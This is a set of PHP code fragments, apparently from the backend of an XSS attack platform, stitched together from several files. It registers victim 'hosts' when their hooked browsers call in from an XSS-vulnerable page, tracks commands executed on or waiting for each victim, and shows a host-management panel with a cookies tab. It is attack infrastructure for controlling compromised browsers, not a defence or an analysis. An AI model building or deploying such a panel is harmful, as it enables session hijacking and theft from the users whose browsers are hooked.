$URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL)); $uri = explode('/', $URI); $saltid = substr($uri[2], 0, 8); // 项目字符串ID if (count($uri) < 4) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } if (strlen($uri[3]) != 50) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $sid = $uri[3]; // XSS漏洞页字符串ID $pmxProj = new pmxProject(); $pmxHost = new pmxHost(); if ($pmxProj->isExistSaltID($saltid) == FALSE) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $pid = $pmxProj->getIDbySlatID($saltid); /** * 判断是否第一次上线 */ if ($pmxHost->isExistSaltID($sid) == FALSE) { $pmxHost->addHost($pid, $sid); // 添加主机 } else { $pmxHost->updateHost($sid); // 更新主机信息 }
<?php /** * 删除主机(IP) */ if (!defined("PMX_ENTRANCE")) { header("HTTP/1.0 404 Not Found"); exit; } header('Content-Type: text/html; charset=utf-8'); if (!pmx_validate_token()) { die("Error: Token is incorrect."); } $ip = isset($_GET["ip"]) ? $_GET["ip"] : ""; $pmxHost = new pmxHost(); if (!$pmxHost->isExistIP($ip)) { die("Error: The IP is non-existent."); } if ($pmxHost->delHostIP($ip)) { echo esc_html("Success: You have deleted IP {$ip} successful."); }
} if (!pmx_validate_token()) { die("Token is incorrect."); } $type_allow = array("executed", "waiting"); // 允许的类型 $sid = isset($_GET["sid"]) ? $_GET["sid"] : NULL; $type = isset($_GET["type"]) ? $_GET["type"] : NULL; $top = isset($_GET["top"]) ? intval($_GET["top"]) : 10; if ($sid == NULL || $type == NULL) { json_out(0, "sid or type couldn't be NULL."); } if (!in_array($type, $type_allow)) { json_out(0, "Type is invalid."); } $pmxHost = new pmxHost(); if (!$pmxHost->isExistSaltID($sid)) { json_out(0, "sid is non-existent."); } if ($type == "executed") { $hostExecutedLogs = $pmxHost->getExecutedLogs($sid); if (!count($hostExecutedLogs) > 0) { json_out(1, "", "<p><center>Empty</center></p>"); } $html = ""; $index = 0; foreach ($hostExecutedLogs as $hostExecutedLogs_item) { if ($index >= $top) { break; } $index++;
<?php if (!defined("PMX_ENTRANCE")) { header("HTTP/1.0 404 Not Found"); exit; } $id = isset($_GET['id']) ? intval($_GET['id']) : ""; $pmxHost = new pmxHost(); if (!$pmxHost->isExistID($id)) { die("Error: ID is non-existent"); } $hostDetail = $pmxHost->getDetailByID($id); pmx_require_header("Host Management"); pmx_require_nav(""); ?> <div class="main"> <div class="main-item-single main-item-hosts-item pull-left"> <div class="main-item-single-left main-item-single-host-item-tabs pull-left"> <ul class="nav nav-tabs host-item-tabs" role="tablist"> <li class="hostinfo active"><a href="#">Host Info</a></li> <!-- <li class="logs"><a href="#">Logs</a></li> <li class="cookies"><a href="#">Cookies</a></li> --> </ul> <div class="host-mgmt-item host-mgmt-item-1 host-mgmt-item-hostinfo"> <table class="table table-condensed table-bordered"> <tr> <td><b>SID</b> <a href="<?php echo pmx_getactionurl_delHostLogSID($hostDetail['sid']); ?>